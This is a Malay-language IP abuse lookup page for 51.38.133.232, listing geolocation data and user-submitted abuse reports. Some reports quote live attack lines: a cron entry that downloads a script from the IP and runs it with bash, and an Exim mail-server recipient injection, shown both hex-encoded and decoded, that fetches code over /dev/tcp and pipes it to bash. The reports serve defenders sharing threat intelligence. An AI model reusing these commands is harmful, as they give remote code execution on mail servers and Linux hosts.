LiveIPMap.com membolehkan anda mencari atau melaporkan kes penyalahgunaan IP. Sila ambil perhatian bahawa rekod penyalahgunaan yang disenaraikan di laman web ini adalah hasil yang diringkaskan dari semua pengadu, dan hanya untuk maklumat anda. Kami tidak menjamin ketepatan, kebolehpercayaan dan kesempurnaan data penyalahgunaan.

Peta IP Langsung

You have exceed your daily query limit.

   

Maklumat IP

Alamat IP 51.38.133.232
Negara country flag United States
Wilayah Virginia
Bandar Ashburn
Latitud 39.04372
Longitud -77.48749
Poskod 20146
Zon masa UTC -04:00
ISP CloudFlare Inc.
Domain cloudflare.com
Kelajuan Bersih T1
Jenis Penggunaan (CDN) Content Delivery Network
Kod IDD 1
Kod Kawasan 703
Ketinggian 89 meters
Cuaca Ashburn (USVA0027)
Keadaan Cuaca Pandangan Cuaca
Penyalahgunaan Rekod 51.38.133.232

Reported on 26 Mar, 2019 12:02:37 AM

local ip directed to ip 51.38.133.232

Hacking IP 51.38.133.232


Reported on 06 Apr, 2019 04:00:41 AM

Distributing Troj/DwnLdr-JUR

Downloads then installs antimalware.ext to C:WindowsTemp


Reported on 15 Apr, 2019 09:51:15 AM

malware

*/5 * * * * /usr/bin/wget -q -O /tmp/seasame http://51.38.133.232:80 && bash /tmp/seasame then run /boot/vmlinuz process with 100% CPU.


Reported on 15 Apr, 2019 08:18:57 PM

FTP download

Server tried downloading via ftp to this server over port 201


Reported on 16 Apr, 2019 06:41:16 PM

Malware attack

malware is spread using


Reported on 17 Apr, 2019 08:23:03 PM

linux port opened

delays server boot


Reported on 28 Apr, 2019 08:23:29 AM

Atlassian confluence hacked

Atlassian confluence hacked


Reported on 28 May, 2019 02:07:55 PM

unautharized connection established with 51.38.133.232

/boot/vmlinuz process with 100% CPU


Reported on 15 Jun, 2019 04:56:09 PM

Target server for an email-based attack

Receiving e-mails from various IPs with encoded addresses that look like "root+${run{x2fbinx2fbash...}}@localhost" and are decoded as, for example, /bin/bash -c "exec 5<>/dev/tcp/51.38.133.232/80;echo -e 'GET / HTTP/1.0n' >&5;tail -n 11 <&5 | bash" &


Reported on 16 Jun, 2019 08:36:28 PM

Tried to inject malicious code into mail server through recipient address

Received the following warning from exim mail server logs: Message 1hcbkW-0007kn-0D has been frozen (delivery error message). The sender is <>. The following address(es) have yet to be delivered: root+${run{x2fbinx2fbashx20x2dcx20x22x65x78x65x63x20x35x3cx3ex2fx64x65x76x2fx74x63x70x2fx35x31x2ex33x38x2ex31x33x33x2ex32x33x32x2fx38x30x3bx65x63x68x6fx20x2dx65x20x27x47x45x54x20x2fx20x48x54x54x50x2fx31x2ex30x5cx6ex27x20x3ex26x35x3bx74x61x69x6cx20x2dx6ex20x2bx31x31x20x3cx26x35x20x7cx20x62x61x73x68x22x20x26}}@localhost: Too many "Received" headers - suspected mail loop This decodes to: root+${run{/bin/bash -c "exec 5<>/dev/tcp/51.38.133.232/80;echo -e 'GET / HTTP/1.0n' >&5;tail -n +11 <&5 | bash" &}}@localhost Which is obviously an attempt to download malicious code.


Laman ini menggunakan data geolokasi IP2Location yang boleh didapati dengan memuat turun di https://www.ip2location.com. Jika anda ingin menyemak sama ada alamat IP yang diberikan adalah salah satu proksi, anda boleh menggunakan alat ini Pengesanan Proksi IP untuk membuat carian.

Alamat IP Carian Terkini

Bahagian ini mengandungi 10 alamat IP terkini yang dipertanyakan oleh pelanggan kami.

217.12.223.35
178.162.216.26
69.75.91.250
35.183.1.150
45.125.65.91
178.162.216.26
178.162.216.26
103.86.157.243
79.2.59.180
91.219.82.133

Nota

LiveIPMap adalah salah satu platform terbuka bagi semua orang untuk melaporkan kes penyalahgunaan IP atau untuk meminta pembatalan kes penyalahgunaan palsu. Semua orang diberikan kebebasan untuk mencari kes penyalahgunaan. Data penyalahgunaan yang disenaraikan di laman web ini adalah kemas kini masa nyata.

Anda boleh klik pada Bukan Penyalahgunaan butang untuk mempertikaikan laporan penyalahgunaan. Pasukan QA kami akan mengkaji semula alasan anda untuk memadamkannya. Walau bagaimanapun, proses pemadamanan mungkin mengambil masa beberapa hari atau minggu bergantung kepada bebanan kami..

IP2Location